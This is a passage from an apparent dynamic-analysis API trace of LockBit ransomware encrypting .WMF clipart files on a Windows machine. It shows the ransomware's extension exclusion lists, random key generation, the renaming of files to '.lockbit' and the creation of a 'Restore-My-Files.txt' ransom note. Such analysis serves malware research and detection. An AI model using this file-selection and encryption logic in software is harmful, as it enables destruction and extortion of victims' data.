nFileSizeLow=0x6f26, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE02270_.WMF", cAlternateFileName="")) returned 1 [0167.468] lstrcmpiW (lpString1=".", lpString2="PE02270_.WMF") returned -1 [0167.468] lstrcmpiW (lpString1="..", lpString2="PE02270_.WMF") returned -1 [0167.468] PathFindExtensionW (pszPath="PE02270_.WMF") returned=".WMF" [0167.469] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.469] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.469] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.469] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.469] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.469] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.469] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.469] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.469] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.469] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.469] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.469] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.469] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.469] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.469] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.469] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.469] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.469] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.469] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.469] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.469] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.469] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.469] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.469] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.470] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.470] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.470] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.470] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.470] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.470] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.470] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.470] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.470] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.470] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.470] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.470] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.470] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.470] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.470] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.470] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.470] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.470] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.470] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.470] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.470] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.470] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.470] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.471] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE02270_.WMF") returned 1 [0167.471] lstrcmpiW (lpString1="ntldr", lpString2="PE02270_.WMF") returned -1 [0167.471] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE02270_.WMF") returned -1 [0167.471] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE02270_.WMF") returned -1 [0167.471] lstrcmpiW (lpString1="autorun.inf", lpString2="PE02270_.WMF") returned -1 [0167.471] lstrcmpiW (lpString1="thumbs.db", lpString2="PE02270_.WMF") returned 1 [0167.471] lstrcmpiW (lpString1="iconcache.db", lpString2="PE02270_.WMF") returned -1 [0167.471] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.471] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02270_.WMF") returned=".WMF" [0167.471] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.471] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.471] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.471] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.471] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.471] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.471] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.471] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.471] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.471] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.471] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.471] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.471] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.472] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.472] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.472] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.472] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.472] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.472] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.472] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.472] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.472] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.472] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.472] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.472] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.472] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.472] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.472] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.472] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02270_.WMF.lockbit") returned 72 [0167.472] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02270_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02270_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0167.474] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.474] malloc (_Size=0x40068) returned 0x1ff1e60 [0167.474] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=28454) returned 1 [0167.474] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.474] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.474] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0167.474] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.475] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.475] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0167.475] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0167.482] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02270_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02270_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.482] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.482] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0167.484] free (_Block=0x1fa2ed8) [0167.484] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02270_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.484] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.484] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.484] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f9ebd00, ftCreationTime.dwHighDateTime=0x1c0033f, ftLastAccessTime.dwLowDateTime=0x59cb4f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4f9ebd00, ftLastWriteTime.dwHighDateTime=0x1c0033f, nFileSizeHigh=0x0, nFileSizeLow=0xb9c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE02278_.WMF", cAlternateFileName="")) returned 1 [0167.484] lstrcmpiW (lpString1=".", lpString2="PE02278_.WMF") returned -1 [0167.484] lstrcmpiW (lpString1="..", lpString2="PE02278_.WMF") returned -1 [0167.484] PathFindExtensionW (pszPath="PE02278_.WMF") returned=".WMF" [0167.484] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.484] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.484] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.484] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.484] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.484] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.484] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.485] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.485] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.485] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.485] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.485] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.485] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.485] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.485] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.485] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.485] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.485] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.485] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.485] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.485] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.485] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.485] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.485] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.485] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.485] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.485] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.485] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.485] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.486] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.486] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.486] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.486] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.486] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.486] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.486] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.486] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.486] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.486] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.486] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.486] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.486] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.486] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.486] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.486] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.486] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.486] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.486] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE02278_.WMF") returned 1 [0167.486] lstrcmpiW (lpString1="ntldr", lpString2="PE02278_.WMF") returned -1 [0167.486] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE02278_.WMF") returned -1 [0167.486] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE02278_.WMF") returned -1 [0167.487] lstrcmpiW (lpString1="autorun.inf", lpString2="PE02278_.WMF") returned -1 [0167.487] lstrcmpiW (lpString1="thumbs.db", lpString2="PE02278_.WMF") returned 1 [0167.487] lstrcmpiW (lpString1="iconcache.db", lpString2="PE02278_.WMF") returned -1 [0167.487] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.487] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02278_.WMF") returned=".WMF" [0167.487] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.487] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.487] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.487] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.487] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.487] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.487] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.487] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.487] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.487] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.487] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.487] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.487] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.487] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.487] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.487] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.487] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.488] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.488] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.488] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.488] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.488] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.488] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.488] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.488] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.488] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.488] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.488] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.488] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02278_.WMF.lockbit") returned 72 [0167.488] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02278_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02278_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0167.493] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.493] malloc (_Size=0x40068) returned 0x3d70450 [0167.493] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=47556) returned 1 [0167.494] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.494] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.494] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0167.494] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.495] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.495] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0167.495] ReadFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0167.498] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02278_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02278_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.498] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.498] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0167.499] free (_Block=0x1fa2ed8) [0167.499] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02278_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.499] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.499] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.500] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2108500, ftCreationTime.dwHighDateTime=0x1bd4b17, ftLastAccessTime.dwLowDateTime=0x59cb4f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb2108500, ftLastWriteTime.dwHighDateTime=0x1bd4b17, nFileSizeHigh=0x0, nFileSizeLow=0x6928, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE02280_.WMF", cAlternateFileName="")) returned 1 [0167.500] lstrcmpiW (lpString1=".", lpString2="PE02280_.WMF") returned -1 [0167.500] lstrcmpiW (lpString1="..", lpString2="PE02280_.WMF") returned -1 [0167.500] PathFindExtensionW (pszPath="PE02280_.WMF") returned=".WMF" [0167.500] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.500] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.500] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.500] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.500] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.500] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.500] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.500] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.500] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.500] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.500] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.500] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.500] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.500] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.500] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.500] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.500] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.500] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.501] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.501] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.501] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.501] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.501] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.501] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.501] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.501] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.501] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.501] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.501] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.501] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.501] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.501] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.501] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.501] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.501] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.501] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.501] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.501] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.501] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.501] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.502] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.502] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.502] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.502] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.502] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.502] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.502] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.502] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE02280_.WMF") returned 1 [0167.502] lstrcmpiW (lpString1="ntldr", lpString2="PE02280_.WMF") returned -1 [0167.502] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE02280_.WMF") returned -1 [0167.502] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE02280_.WMF") returned -1 [0167.502] lstrcmpiW (lpString1="autorun.inf", lpString2="PE02280_.WMF") returned -1 [0167.502] lstrcmpiW (lpString1="thumbs.db", lpString2="PE02280_.WMF") returned 1 [0167.502] lstrcmpiW (lpString1="iconcache.db", lpString2="PE02280_.WMF") returned -1 [0167.502] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.502] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02280_.WMF") returned=".WMF" [0167.502] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.502] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.502] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.502] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.502] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.502] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.503] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.503] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.503] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.503] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.503] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.503] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.503] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.503] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.503] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.503] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.503] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.503] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.503] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.503] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.503] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.503] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.503] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.503] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.504] lstrcmpiW 